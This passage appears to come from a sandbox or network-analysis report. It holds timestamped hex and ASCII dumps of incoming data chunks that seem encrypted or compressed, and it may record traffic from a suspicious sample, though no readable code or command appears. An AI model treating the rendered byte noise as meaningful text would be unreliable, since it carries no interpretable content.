2023-09-07 07:31:08 UTC	137	IN	Data Raw: a0 c4 3a 21 8a 6f d4 9d d8 e2 64 e1 fd 57 c2 4b 6a ba 62 b6 41 6f 9e df 59 95 41 2b ab 4d 00 ae 77 aa 9f 86 71 f8 fc 1d 03 c2 a7 fa 03 64 c1 bc a9 26 09 fd 03 ff 59 54 7d 2f 7d f6 2e 85 0a 93 8e 54 db 9a 8c a6 d9 84 c1 2e e9 a3 15 32 7b d2 76 06 ef f6 9f 88 e5 43 88 db 23 4e 3e f4 6e c5 0e 36 04 f6 d8 86 a5 4b 7c 95 79 31 f5 40 dd de 26 a0 73 b4 ee a8 cb 8c f2 15 a0 f1 7d b8 fb c4 46 1e c6 1f e7 b7 8d c4 df e2 f4 8c b0 ff 11 77 ad fe 8a a3 10 fd d5 ef a9 6d f4 e3 85 03 7f c2 f8 fa 12 62 8e 8d 1d 79 9e ae 8f da 9d 0c 40 3f 4e 0c 00 e8 fa 71 0d 84 4d 08 49 05 3d 31 0b ef 37 a5 ed d8 3b 06 37 63 81 c5 65 17 71 9b e6 77 0e 20 1d 2f 08 54 78 61 aa 75 89 c9 47 87 9f 8b d4 b3 6a 8e 17 1d 5e fd 46 6e e3 d0 b3 b7 86 64 8f 2d 11 f0 61 40 ea 21 e5 05 6e 51 47 ff 77 Data Ascii: :!odWKjbAoYA+Mwqd&YT}/}.T.2{vC#N>n6K\|y1@&s}Fwmby@?NqMI=17;7ceqw /TxauGj^Fnd-a@!nQGw
2023-09-07 07:31:08 UTC	138	IN	Data Raw: 2e 81 b3 30 89 8f c1 05 12 57 d8 18 84 c2 29 09 80 79 8b b9 a6 df 04 d4 06 6f 46 44 ab b1 2b cb 2e 2d b2 f7 f1 cb af ec 5d d1 7e cc ae 8c b9 b4 27 b8 20 73 c5 0d fc 20 ab a4 a4 3d 22 bb 85 e6 f2 c4 13 ff 54 85 50 98 36 c0 30 08 52 92 cf fb 51 ea 3d 2a 3f 1c 03 4c e2 4d 6b 71 13 70 68 4f 2f ae a6 9f 1b bf 05 c6 3c c4 8e cf b1 89 f3 85 3f d0 09 0e 3e 1e b9 6f 7f b7 7c d8 86 d4 41 07 6b 3d 17 4d 8f 48 22 f5 cb d4 a1 38 55 c9 05 07 0a 05 f7 25 10 ce dd bd 87 53 3b 21 54 dd 94 b8 eb b7 26 6c aa 4a 62 c3 78 3e 5c f4 18 ef 8a 98 8c 80 5f 6c a6 b7 8a 35 63 79 92 5d 96 d8 54 4c 53 53 35 04 a4 4b 7d e5 4a 5c a1 fd 08 7b 8a 77 f3 77 70 3f 51 a5 ef 2c 46 2c 07 00 be 28 78 eb 83 1c 68 04 16 78 67 9b 52 08 99 f7 29 87 9d 72 46 b7 25 22 ce 3c dd ee 2b e4 68 7d 08 3b a5 Data Ascii: .0W)yoFD+.-]~' s ="TP60RQ=*?LMkqphO/<?>o\|Ak=MH"8U%S;!T&lJbx>\_l5cy]TLSS5K}J\{wwp?Q,F,(xhxgR)rF%"<+h};
2023-09-07 07:31:08 UTC	139	IN	Data Raw: a6 56 e7 b0 ab 5b 95 b3 1e 71 64 9c ea 9b a3 b6 32 70 dc da f4 58 ea f1 94 eb db 47 71 7c ac 7e 6d 73 0d 2a 4c 31 c5 50 70 1f 20 11 da 73 07 d4 9b 6d 94 74 75 5a 97 70 97 91 95 b4 26 99 e2 fd b2 83 f3 00 c5 f8 3e b6 ec 0b 5d cc 6b 54 95 eb 09 fb 91 7a 50 c9 44 1c 3a 5b 3c 37 d8 d4 09 aa e9 ea 9d 63 97 1d c0 c5 f7 68 05 bc d7 bb ea cd f9 bb e4 8d 99 ad 05 e3 84 7b 4a fc 4f 03 90 09 3e 3e ac db 00 eb b8 b5 fe ba 08 5e a0 66 78 c4 aa 94 9f d3 2f 37 ab 48 d1 62 4c d1 17 22 99 f3 c5 80 8d 80 d9 46 b8 a8 f6 ed e4 81 22 db ff 58 59 6b 4f 38 06 6f 2d c0 88 15 cc 0a c8 b2 0f d6 60 13 a1 13 30 ac 27 5c e9 d6 de d4 06 de 08 d1 3c ad 45 d9 5a 1e 0c c1 f6 16 93 95 be 3d f9 af e5 ef 53 8e a9 6b ca d2 e8 20 7a a1 e8 34 6f 08 fe 8c b5 b4 51 38 36 0c d3 65 10 d9 70 cf 8b Data Ascii: V[qd2pXGq\|~ms*L1Pp smtuZp&>]kTzPD:[<7ch{JO>>^fx/7HbL"F"XYkO8o-`0'\<EZ=Sk z4oQ86ep
2023-09-07 07:31:08 UTC	141	IN	Data Raw: f7 0b 0e 7f 86 a3 31 6c 21 3e 92 29 3b 34 fe fa 56 dd 6d a2 6f 6e 46 3a 13 20 65 42 24 e5 fb 34 de 64 e6 4a 2e 72 d1 81 40 40 fa 53 2b 46 39 0c be d0 ad b6 6d f3 1a 16 17 60 4d 49 4b 0f ca cc d8 64 83 2b 07 a0 19 71 5a 32 da 7f bc de d9 7e 44 51 0b 4c 29 ce 37 47 75 cd 55 e7 0b e4 9a 4e 6b 7f 68 9e 83 81 88 6e f1 69 f9 fc ee 29 89 16 9f b7 40 19 56 b8 af b7 ac 13 26 ad 74 02 f0 d3 ad 7a 04 70 a7 8c 4d 89 d7 5b a2 a6 f4 0f d1 2a 87 e1 eb 23 7b b9 fe 01 12 53 a2 24 3d b6 f1 be 00 a1 75 0c 2f 7c 40 b5 1c 89 ea 41 b1 6e c2 e3 ab 52 24 20 b4 3f 14 47 04 cf 9a df cf 47 9d 1a a3 32 36 4a 38 2e f6 18 a0 22 4d 71 90 d9 ce 52 2e 92 8b c7 f1 0b 21 8f 38 e4 c8 d0 34 aa 1c c2 91 cd 16 f6 57 98 c1 ea f9 90 c1 fa 18 86 b9 89 0a 48 3b 9c c7 de ed 28 e0 fa ab 2e df e1 19 Data Ascii: 1l!>);4VmonF: eB$4dJ.r@@S+F9m`MIKd+qZ2~DQL)7GuUNkhni)@V&tzpM[*#{S$=u/\|@AnR$ ?GG26J8."MqR.!84WH;(.
2023-09-07 07:31:08 UTC	142	IN	Data Raw: 87 7b a0 df c0 e4 de b3 90 5a 6c 62 29 68 0d 4d 8f 4d f7 e4 0b 6e 7e 9b f7 2a a1 dc 2a d7 cb 56 51 c4 41 85 40 83 06 c6 f7 97 03 f6 4f d3 da c5 98 1b c2 e8 08 ce b8 6d c9 99 9c 4b cc a3 c6 53 bb 5a a4 2a be 2a 4f a4 2c 2c b8 8e d2 57 3f 12 cf 13 ee 1b ce 3c 60 13 79 f8 d2 41 83 3b df 09 0e 96 7d 4e 0b 2f 62 6a fa 06 ad 1d b6 43 6e 44 ce 55 4f 2e c6 bc 01 55 44 16 c4 1f dd 2c 89 73 8b 43 a5 97 d9 3d 6d ee 35 f2 e9 4e ee aa 2e f1 69 e8 a7 d1 af 6e 05 84 61 d3 d5 21 1e e4 cb d6 e2 38 93 c5 e7 d6 30 07 ae 72 46 e4 64 8f f1 26 0d 31 6a f1 fd b3 15 52 a2 3e 4d 8d 57 0c bb 4d 0e 33 ed 2d 77 26 02 23 77 2f 09 4a 78 2a 1c 6f e4 94 43 c9 af 53 12 08 0f 44 92 9a cc f6 ea 31 4e 1a 69 ac 78 e3 40 7e 05 43 22 5c eb 16 e3 c4 e2 47 33 b3 db 5b f3 e2 33 87 e5 33 69 85 e9 Data Ascii: {Zlb)hMMn~VQA@OmKSZO,,W?<`yA;}N/bjCnDUO.UD,sC=m5N.ina!80rFd&1jR>MWM3-w&#w/Jx*oCSD1Nix@~C"\G3[33i
2023-09-07 07:31:08 UTC	143	IN	Data Raw: 76 67 4f 42 00 16 f5 3e 43 ab 2f bf 5d 21 2c ce ec c3 e6 76 e6 64 d9 27 d3 b9 09 bd ec ad 8e e0 35 52 e8 76 5c df 93 a7 cf f9 36 40 0b 7f a7 8b 4f 32 1f c0 14 24 0c d6 92 f3 bc 62 c0 01 5b c2 33 a5 ee 1e 65 d7 40 33 7a f1 20 8a eb 7c d1 b6 db b8 67 95 bd 09 bd ac 61 76 4c 4b 80 f3 62 89 c4 8f 09 65 d9 ba ce 76 df a6 ac 42 f1 87 1b 99 ef c4 3a a5 92 61 cd ea da 99 61 95 51 4a 92 4b 6a 3c 7a d8 41 ea a4 c2 59 0b ed 1e fb 4d 00 28 7f 3e 94 3f 57 73 fc 8b af ff f7 fa 03 e2 c9 d7 a5 f7 2a 32 01 6d f5 1d 2d 2f 7d 70 26 ec 09 fe 86 2f de 54 22 e3 8c 84 c1 e8 e9 78 0f e9 73 cf 76 7c 40 ab ca 88 e5 85 88 f6 24 3d 3a 7f 6e fe be 53 51 f6 d8 00 bd 25 6c e2 7b fe f7 73 6d af 73 a0 73 32 f6 a6 d2 4a d2 6e a5 ac cd f1 ad c4 46 d8 ce 56 fb d7 b4 d9 df 80 44 ed e6 ff 11 Data Ascii: vgOB>C/]!,vd'5Rv\6@O2$b[3e@3z \|gavLKbevB:aaQJKj<zAYM(>?Ws*2m-/}p&/T"xsv\|@$=:nSQ%l{smss2JnFVD
2023-09-07 07:31:08 UTC	144	IN	Data Raw: 6b 83 54 e6 d5 a7 8b 91 3b 26 4a 6d 8c f4 b4 6d b4 60 e4 4a 4f b5 d1 29 ac 1b ab b0 44 bb 5e 26 29 13 de 63 03 78 40 c0 d0 e9 77 3d f9 2a 70 8f 6b 9f fe 46 27 1a e9 c7 0d 6c c6 99 37 bd 1a 58 02 b6 b6 ad e3 ab 96 ce ab 23 c5 bc 97 f3 69 8a ee 95 3b 21 00 1b b5 fd be b7 89 ec a5 05 50 b8 88 e4 ea 91 e3 d3 e8 7b 19 3f e4 52 59 f2 42 37 27 28 b0 bd 8c 55 cb f2 9b 96 d8 05 9d 51 2b 5d 82 72 8a b0 a4 86 8c d5 00 63 44 14 ab 13 28 39 2c 8a b2 9b 62 dc ad 2d 5d 81 6a 38 b4 67 b9 b7 26 d9 ab b2 c5 e4 dd e7 a0 ea a0 d8 2d 17 87 c3 79 f4 19 b5 54 4a 58 07 29 91 30 4f 52 22 57 4b 53 d3 3c 29 22 15 01 39 e6 76 49 72 9c 39 68 20 0d ee a4 ac 19 8a 06 91 3c d5 1e a5 ab 55 f1 3a 3e 17 03 7f 30 59 b8 60 e5 0b 7c 91 86 31 7b 39 71 3e 16 0c 9e bc b0 a4 cb 3d 80 37 5e 57 01 Data Ascii: kT;&Jmm`JO)D^&)cx@w=*pkF'l7X#i;!P{?RYB7'(UQ+]rcD(9,b-]j8g&-yTJX)0OR"WKS<)"9vIr9h <U:>0Y`\|1{9q>=7^W
2023-09-07 07:31:08 UTC	145	IN	Data Raw: e8 eb f9 d0 f7 50 e5 28 8c 98 0b 16 07 0d 3d f0 c4 2e 2b 42 fb 82 2d 4b 7f a1 34 98 7e cd f9 9c 4f 16 d3 4b 88 74 61 20 ba b4 08 13 b6 b0 6f 1e e4 69 f6 d0 67 e2 e7 57 4e b6 70 cc 25 e4 8c 04 1d 78 10 40 91 43 61 d3 70 08 69 f9 2b f5 e6 0d 2b cd e3 0d 6c f3 e7 47 0e 41 dd 7e 93 d6 65 8b 1c 6a 68 24 9c 4b 4d ec cc 98 a8 56 Data Ascii: P(=.+B-K4~OKta oigWNp%x@Capi++lGA~ejh$KMV
2023-09-07 07:31:08 UTC	146	IN	Data Raw: 55 d6 c8 ff a5 6e 28 48 a9 6a 94 df 12 bd 6d 23 e3 5f ad f5 e1 31 df 7a fa 87 e2 e5 96 78 c6 d4 7a 9c 74 62 7f d3 04 a5 45 46 cc 44 72 59 20 61 20 a0 07 6d 9b 20 92 07 71 af 97 8f 9a af 46 88 26 07 fc da ba 05 f4 cb d1 2f 35 09 37 2e 42 23 60 ee 9d a1 06 5d 97 3c 50 c7 91 1c 36 12 3c 89 dd e4 01 1b e8 ea bc fd bb 54 c0 d3 ea 89 11 1d cf 87 f7 af f5 f5 3d 7d 94 2a 09 2c 8c ce 50 cc 43 55 93 ee ff 14 ac 7f 00 a9 a8 70 fc ee 0a dd be d3 a1 68 aa 00 80 ed 27 8c af 07 cd 13 44 45 ce e6 81 6b cd ba 85 c3 c3 13 ba 1b f6 50 22 39 22 4a ff 15 5f 40 4d 15 06 77 2c a0 5c 74 cf e2 d0 1e 07 c5 63 16 af 05 3e ff fd b4 f1 fc de 8b 0e 50 2e 33 32 d3 46 7f a2 71 02 40 f6 2c 9c 0b ba 84 fb 2d ec 13 73 0f aa 83 d2 7e f0 b1 61 63 f0 19 60 e2 24 fd ba 5f 50 2f 2e f3 ca 7f 1f Data Ascii: Un(Hjm#_1zxztbEFDrY a m qF&/57.B#`]<P6<T=}*,PCUph'DEkP"9"J_@Mw,\tc>P.32Fq@,-s~ac`$_P/.
2023-09-07 07:31:08 UTC	147	IN	Data Raw: a5 39 5a cc eb 43 12 b1 97 3f 31 ac 25 d2 9c 02 3b 60 ff f0 48 2d 6f 5a 7f 78 4b e8 02 f8 61 5f 06 bf e7 f8 dc 77 f4 b3 32 0f c4 df 46 a5 e6 44 2b d0 35 e3 b4 d8 ad 3d 42 b9 1a 2f 17 d5 53 00 53 2c cb 1e d6 19 95 0b 02 98 12 e1 5f f3 c7 41 a7 da c4 96 57 54 10 6f 34 59 2a 8a 60 72 53 df 0e 74 93 09 68 6e 6d 64 9e 9b 8e 87 f6 a3 e2 ae fa 09 8c 73 99 c9 42 c7 57 5e b3 56 ae 52 34 bc 7f 28 ed 6c a8 ca 12 c7 b1 8c 48 ad d1 29 b4 fa f5 92 c3 45 8a ab f8 d2 63 33 e7 5c 13 76 b0 e7 28 8f f2 9c 1e 19 75 fd 33 af 5a d4 17 6e e7 86 b1 f8 db 93 ae 1b 38 4f af a6 14 a2 2e 6f 83 90 dc 77 81 d4 a7 1a 37 1c 3d 0e fe 6c a3 64 52 f1 8d 6c d2 6b 25 33 96 38 ec 0b 21 8f 38 84 cd d0 31 0d 00 cb 94 b0 0f 87 4e 71 c4 ef eb 30 c1 72 1d 60 b5 38 00 ec 3d f3 c9 1d f0 a5 fb 77 b5 Data Ascii: 9ZC?1%;`H-oZxKa_w2FD+5=B/SS,_AWTo4Y*`rSthnmdsBW^VR4(lH)Ec3\v(u3Zn8O.ow7=ldRlk%38!81Nq0r`8=w
2023-09-07 07:31:08 UTC	148	IN	Data Raw: b1 62 8e 63 9d 63 a2 4c aa 9d df f8 93 d4 64 f3 2c 41 15 60 8f 6e 9c b0 08 66 7e 99 fe 2d a0 aa 31 42 ca d4 3b cd 41 31 41 2d 0a 41 f5 56 19 fe 4b 6f b0 78 99 29 c6 66 00 49 bf 1b ca b4 9c ba a5 e0 c4 5b bb 8c af 26 b9 c9 4e d5 2f a5 d0 87 d2 0f 3c c5 c5 46 ec e4 c9 4f 62 1a 79 54 d1 fc 81 a4 ff e4 0f 72 64 62 0b 9b 61 26 f8 8e ad b7 92 30 6c c1 d5 3d 4b 6c c4 b4 01 91 40 c7 e6 4a df f7 96 0a 89 4b a5 db dd eb 6f 75 15 ff ef 8a f7 8b 2e a5 6d f8 bb 59 af a4 21 f7 63 72 ce 6b 1a cc cf de e2 dc 97 11 c5 83 32 d7 b1 73 42 ec 64 e3 f5 ea 0f af 4a dc fb 14 12 76 a2 4a 49 ed 55 84 bb a6 2a 5c eb f7 6c 76 06 68 74 27 09 4a 7c a3 20 3a e6 f7 5c c1 b3 8b 78 81 0b 6d 8e 03 d4 94 f6 3f 52 3e 69 57 17 d1 5c 76 05 51 3e 8c ef ec f8 70 e6 06 44 ba db fb f7 59 29 67 fd Data Ascii: bccLd,A`nf~-1B;A1A-AVKox)fI[&N/<FObyTrdba&0l=Kl@JKou.mY!crk2sBdJvJIU*\lvht'J\| :\xm?R>iW\vQ>pDY)g
2023-09-07 07:31:08 UTC	149	IN	Data Raw: 43 44 fc b5 6a b4 4d ea 08 59 eb fa 63 b2 2f 85 e7 f3 2e e0 ec a4 f2 f8 e6 46 fb 11 ce 6e ac 92 ec 8c 93 f5 37 21 ea 04 51 3b 91 e1 67 78 2b 93 09 97 a7 e0 5c 5d 1d d9 14 ec bb 04 90 dd bc d4 de 8f 5b bf 11 12 f0 90 cb f8 40 93 64 e4 2b 6b ef b4 ef 52 d9 f7 cb f4 a2 da bf 04 69 c4 51 f8 a0 ea 62 00 77 5d 0b 4b d9 5c e6 f8 df ee 8e f5 d1 26 b5 b6 ef 24 1a f2 88 a7 d5 c0 fb 7d 63 c1 fd cb b3 98 68 94 62 90 78 54 84 db 59 db 63 cc f9 63 00 ce 55 9f 94 67 75 a4 de c0 01 d0 f7 fa 20 b7 c3 14 a1 db 28 d6 03 df 59 dc 0e fc 7f d8 2e 23 2f 1d 8e 36 de f4 a8 31 8e aa c1 ce cd f6 0f f4 63 f8 53 db ed 84 ca 28 c0 90 8a 13 2a 41 1f 9b 6c e5 0e b2 74 25 da a8 a5 cd 52 1b 79 e7 f7 6e fb 7d 71 8e 73 f4 c8 9d c8 ff f0 d9 83 2c 7f de ad 64 60 cd c4 b7 ff 9f b3 3d dd c2 f4 Data Ascii: CDjMYc/.Fn7!Q;gx+\][@d+kRiQbw]K\&$}chbxTYccUgu (Y.#/61cS(*Alt%Ryn}qs,d`=
2023-09-07 07:31:08 UTC	150	IN	Data Raw: 68 b6 ac 67 49 3d 76 e5 eb 30 a8 ca 2a 55 52 2d 9d 47 b4 88 be d3 f4 e6 5e 07 c7 a0 ac 16 ba 36 59 fe 5e da 2c 57 fa 0b 06 f8 46 8d c4 47 70 33 fe d0 6a ab 63 84 f6 f5 2e 44 e1 ec 05 bf cf 88 3e fc 12 f8 09 96 bb e4 ef 4a 95 26 a7 b1 d5 23 95 5d 79 a4 ff c1 26 77 10 65 a4 cc a0 55 9a f0 b1 41 45 be 9d 81 ff e2 eb d5 fc cc 0f b9 f0 2e 45 f8 5e 50 32 90 ac c2 92 28 de 1e ba ca f8 fc a6 53 28 49 82 f5 a0 b6 a6 5f 8d cb 06 b6 59 d4 ab aa 28 0a 2e a5 bd 72 7a cb ae cf 5d 06 6d 25 b6 a6 b8 9f 27 46 8a 72 c5 0d fd e1 a2 45 ba 83 22 b5 84 6b 79 aa 33 fd 54 03 59 ee 34 65 37 07 52 22 45 d6 51 9c 38 cf 3e 41 00 2f e7 17 74 b9 9e 70 69 7e 2f 5a 86 e9 19 cb 08 fb 3c 4f 11 ca b1 cd f2 26 3f 0b 03 99 32 56 b8 9e ed f9 6f de 86 52 58 d6 73 f4 1f 46 8f 96 b1 ce cb 45 a9 Data Ascii: hgI=v0*UR-G^6Y^,WFGp3jc.D>J&#]y&weUAE.E^P2(S(I_Y(.rz]m%'FrE"ky3TY4e7R"EQ8>A/tpi~/Z<O&?2VoRXsFE
2023-09-07 07:31:08 UTC	152	IN	Data Raw: 25 63 54 36 82 a0 87 96 86 bc ca 18 cf f5 61 79 61 59 06 d1 a0 88 40 a1 b2 df 4b b2 51 19 7c 9c 3f 50 a4 96 04 b2 e2 a6 84 63 34 c2 ce d3 7b aa d4 90 1f a6 88 9f b5 e7 0f 77 af 96 3e 92 22 49 46 63 bb 74 2e 94 56 f5 c8 16 03 4a 1f 9a 22 0a 59 9e 85 1d 45 15 97 49 16 53 83 cd 65 78 99 22 ab 3d 67 b4 75 5a 0a 8d f7 64 7b 8d ac 24 d8 c5 28 dd f0 f4 a6 cb 59 d3 d9 34 e6 4d 78 58 48 e5 8a fa 90 50 ea 05 af bf 86 ed d0 ac c4 32 ba 2c 24 e9 1a 0a 5e 41 0d f8 2b 39 8e c6 06 23 12 f4 50 16 66 b0 d2 85 e8 88 43 e6 c3 10 de 12 39 87 14 99 a9 1e c3 1a 96 94 b2 92 6e 21 5d 79 3d fe 6b 96 f4 fa 7f 2e fe 1b 31 45 e5 7c 08 5b 5b d4 a4 f9 42 26 8e 88 af c6 e3 68 b0 a9 92 8e 2e 54 a8 f4 9e 9d b0 c8 58 e0 aa ad 5a 3a df 52 29 34 26 6f d1 74 95 5f d5 92 6e 04 c4 bc 85 32 6f Data Ascii: %cT6ayaY@KQ\|?Pc4{w>"IFct.VJ"YEISex"=guZd{$(Y4MxXHP2,$^A+9#PfC9n!]y=k.1E\|[[B&h.TXZ:R)4&ot_n2o
2023-09-07 07:31:08 UTC	153	IN	Data Raw: 52 69 83 77 e2 27 1b 71 9a 73 d0 f3 a3 9d 9c b5 52 36 d6 b4 2c a7 0c 59 0a 9c 56 25 db 86 09 5c 27 e0 8d 6b c9 da 6c 1c de 43 58 52 2d 7e 26 57 68 3b fc c3 46 4e 7b 54 aa ce 87 ca 72 e6 ec de c7 4e 69 23 0f 36 03 76 96 ea aa c6 65 77 76 d0 4f 99 55 dc 11 48 65 23 9b 90 71 70 80 5b 67 4e 6a e3 3c 59 a7 ce 66 fa d5 04 79 55 83 80 a4 88 c5 9a 27 61 f7 d3 78 e5 fb f1 5d 1a 42 51 e1 4c 3b 47 9b 08 09 c5 01 32 18 1b 23 16 05 40 01 26 7b 26 97 08 ac ef 96 37 2e 91 a2 f4 1f 09 89 9c 45 6d 5a 64 c1 ad ad 74 28 87 45 51 62 8f 31 a1 14 40 be 93 b1 c0 f9 4e 07 f4 6b 9e 2f 9f ac 31 bc 95 bc d6 36 04 64 09 47 2c 2f fc 08 5b 33 fe 4a 4c fc 2a 05 1b 68 7f e6 a8 d5 c5 96 13 96 86 9d 28 ee 73 eb 6e 0d bf 3e 2c c4 dd c9 10 5e c2 10 02 b7 30 d9 72 76 0b d4 e7 0f 7e b5 34 c6 Data Ascii: Riw'qsR6,YV%\'klCXR-~&Wh;FN{TrNi#6vewvOUHe#qp[gNj<YfyU'ax]BQL;G2#@&{&7.EmZdt(EQb1@Nk/16dG,/[3JL*h(sn>,^0rv~4
2023-09-07 07:31:08 UTC	154	IN	Data Raw: c5 04 f8 87 20 af d1 b3 36 c8 9d 14 9e c8 c4 0a 71 a5 f8 93 12 f4 8d b7 85 9a 89 e6 ba 62 14 cc 68 e6 6c 41 2f b0 92 ca 64 d2 86 85 47 1e 30 91 f7 62 f5 f8 e6 7e 79 a1 c1 e1 89 fe 85 31 07 4c 33 60 92 a5 2c 3f e0 24 69 1d fd 4d 9b 0f cf 50 c7 98 39 37 7f 47 06 81 17 00 29 06 3c 8e 0d 77 9c 37 40 7c 3b 1b 8f c6 7c f2 05 24 89 d8 1a f9 e7 13 fe 72 9c 1d cf 2a de 80 b0 c7 c4 a5 14 ea 2d 57 7f 04 ea bd f5 84 79 0b 7e 5e 90 1a d3 c3 43 97 cb a9 42 b6 35 e0 2d 2b 4d 26 87 8b 18 83 3b 15 e4 ab cb 6f b0 1b 63 75 c9 61 b7 bc fb 93 d2 fd 8f 3d cd bd de 08 da af 3a c2 59 85 a6 fa a0 32 3f d7 a6 3e 98 cd b8 7c 60 5b 0d 8c a2 96 e6 cf ad 31 7f 62 09 05 78 4a 62 2d 9f f2 ff ee e5 6e 03 a7 a6 18 4f 6d aa d3 72 b0 44 c4 8d 31 af d0 e1 3e 8b 13 c4 e5 aa d8 6d 2f 70 d9 8e Data Ascii: 6qbhlA/dG0b~y1L3`,?$iMP97G)<w7@\|;\|$r*-Wy~^CB5-+M&;ocua=:Y2?>\|`[1bxJb-nOmrD1>m/p
2023-09-07 07:31:08 UTC	155	IN	Data Raw: e0 7b e9 46 75 f1 c8 9e df 7c 9e ea 27 2a 87 73 5a 76 37 e7 96 d7 90 bf 8b e4 a6 39 65 74 cf 6b 69 9b a6 d2 af a9 d5 87 92 56 08 10 50 fa da bb 26 c0 04 aa 0d 07 51 2d 06 33 c8 4d 80 fe d0 1a c7 3a 18 e0 49 e6 9e 02 52 c2 32 e2 18 c2 2b 36 27 6a d5 d5 c7 11 a7 4a 35 c4 49 c1 37 ef 19 94 e5 11 f0 06 7c 9b 6e 23 8a f6 74 d6 28 3f 08 ff 16 03 92 70 19 10 1b a1 70 ed bb 4c 0f fb 5b 2c fb 65 42 aa 9f 12 87 5f 8c 68 a8 64 b2 cf da cf bb c4 fa 4e 35 68 8f 31 13 a5 fc a1 13 90 36 02 62 b9 e4 29 41 ca 76 f7 75 85 a5 b5 fb f3 df 9d c0 38 30 91 41 e6 9c 17 a6 85 34 41 13 59 4e 10 81 9d f0 d4 a9 b0 cb d6 d7 09 fe 40 69 40 24 2b c3 ae 62 82 02 8e 6a 0f d9 7e ad 2b 9e ab 8e 31 9a f5 d6 f3 ef a6 51 21 cb fa ac ae b9 ed 00 83 91 29 f3 28 01 ba 36 42 38 e9 f5 93 36 e9 2c Data Ascii: {Fu\|'*sZv79etkiVP&Q-3M:IR2+6'jJ5I7\|n#t(?ppL[,eB_hdN5h16b)Avu80A4AYN@i@$+bj~+1Q!)(6B86,
2023-09-07 07:31:08 UTC	157	IN	Data Raw: df 49 e4 f6 c3 05 28 ed 48 29 27 2a 61 f5 68 93 71 ce b1 65 0e c4 ab 93 2e 66 34 c3 0a c8 ab c4 94 de 21 53 99 cc 9c bc 08 22 85 8d 4d f5 9f a0 65 f1 26 b2 d0 ba ec 93 bd 7e ee 4e b7 9a bd 25 70 22 ea 06 07 48 85 0e 45 a3 79 a1 40 6e cb 0c eb d0 79 44 c9 ae 33 9a bf aa 3b 61 5d 0c 0a 59 d6 1a d8 ec 70 78 a4 98 e4 df 11 c9 b5 94 d3 8c 3e 1a e1 c7 6b 99 31 91 ba 01 e3 a7 4b 1b 2a 48 e2 b5 e3 38 d0 1d d6 8e 37 73 b3 00 d8 3b c4 c8 59 18 2c d6 59 a1 90 e3 71 90 30 e9 aa 36 32 d4 9a d3 12 af 02 61 90 51 67 84 8e 23 60 1e a9 26 79 79 6e 2f 66 34 d6 72 84 1a dd 63 c9 0f b5 b9 ec 47 06 2b a7 06 41 a1 6d b3 d1 7f c1 34 fa 44 d1 c9 3e 3d cc 55 89 42 8e 48 80 c5 77 d9 a9 9c 3e 5e 2f 08 41 a8 f4 04 ef e4 b1 7d f3 38 b6 18 e3 36 5d 0b d1 a4 e1 c3 d3 2c c8 b1 75 0c 34 Data Ascii: I(H)'ahqe.f4!S"Me&~N%p"HEy@nyD3;a]Ypx>k1KH87s;Y,Yq062aQg#`&yyn/f4rcG+Am4D>=UBHw>^/A}86],u4
2023-09-07 07:31:08 UTC	158	IN	Data Raw: 54 32 b7 26 2f df ae 82 10 45 c3 06 02 de 36 ce 53 69 09 b1 d8 22 7f a9 2e cd d4 f4 cd a3 80 e2 9e 98 7e 1e 7a 95 79 62 27 cd d0 35 a8 81 67 61 cc 10 e1 58 1e 32 cc 6c 7b 8d 6e b3 c4 a5 9b cf aa 53 55 e4 4b 66 c1 6b 65 ea ae 91 31 e8 d1 ba 71 45 4a 7b dc fe 01 d1 1e 3a 1b 90 7f a4 53 69 e0 ea 31 81 8a 5a 04 3a ae b1 6b 5c ce 71 ec d5 22 77 5e 3d 9f b2 87 90 97 af fb 7f e3 cd 57 48 7a 4c 59 b5 b4 ed 75 9b 88 ab 63 b6 03 6b 5b a2 11 75 83 f0 13 ee a0 e1 e5 50 29 f0 c9 db 6c ed f3 b4 1b bd 8a 83 8f 89 35 7a 88 9b 2b 9a 5f 72 49 68 f2 2c 71 f1 27 e3 f5 16 07 4c 19 89 30 1d 59 89 95 37 4e 0f e3 4e 16 50 92 fb 61 2c ae 6a f6 7b 0e 98 74 02 28 92 f3 27 20 e1 a2 33 f9 ce 3f c7 aa a5 c3 f5 30 f7 ce 2f dc 4c 6d 58 07 dc 80 f1 d0 62 8d 15 a8 85 b7 b6 8b c0 f2 19 b4 Data Ascii: T2&/E6Si".~zyb'5gaX2l{nSUKfke1qEJ{:Si1Z:k\q"w^=WHzLYuck[uP)l5z+_rIh,q'L0Y7NNPa,j{t(' 3?0/LmXb
2023-09-07 07:31:08 UTC	159	IN	Data Raw: 14 3b 2e 91 dd 68 a1 02 ef 96 07 a7 d6 e6 5b dd 22 d0 fb ad fe 01 12 66 ca bd b0 80 ef 5a f1 3f 89 d2 3d db b7 55 bc 0d 2c af 7e 72 90 cb b1 87 cc cc 17 a2 ed 53 ca d9 2a 46 a3 01 fb a7 c7 61 d2 2f e3 8d 4a 6b 18 c3 4b 21 f9 57 c5 fa ad 57 00 8c ad 09 79 77 4f 03 2f 7a af 0c e3 69 41 83 01 19 82 ca ed 0c 09 5c 29 e6 7b 97 74 9b 74 20 42 69 94 6a 91 34 1b 68 eb 77 d5 9d 85 9f 8d 8f 5e 36 c6 db 03 9e 08 6e 03 98 5f 10 c7 9d 6a 78 20 e7 a5 6c a1 f0 6c 06 fa 31 72 5f 3e 64 27 71 62 56 de c8 46 1e 51 56 a5 ef 9b da 45 f2 c0 d4 b3 01 7e 23 15 3b 36 76 80 8f 88 dd 04 54 13 c6 7b f8 44 dd 7f 7d 01 20 fe b7 66 72 c4 64 74 45 65 f0 59 6d c8 f5 61 e4 bb 07 7d 44 b0 8e aa 93 ca 89 42 62 92 ee 49 c5 f7 e0 5a 36 4e 4f ea 5c 3b 47 9b 08 09 c9 1b 36 08 16 32 1b 6a 4f 26 Data Ascii: ;.h["fZ?=U,~rS*Fa/JkK!WWywO/ziA\){tt Bij4hw^6n_jx ll1r_>d'qbVFQVE~#;6vT{D} frdtEeYma}DBbIZ6NO\;G62jO&
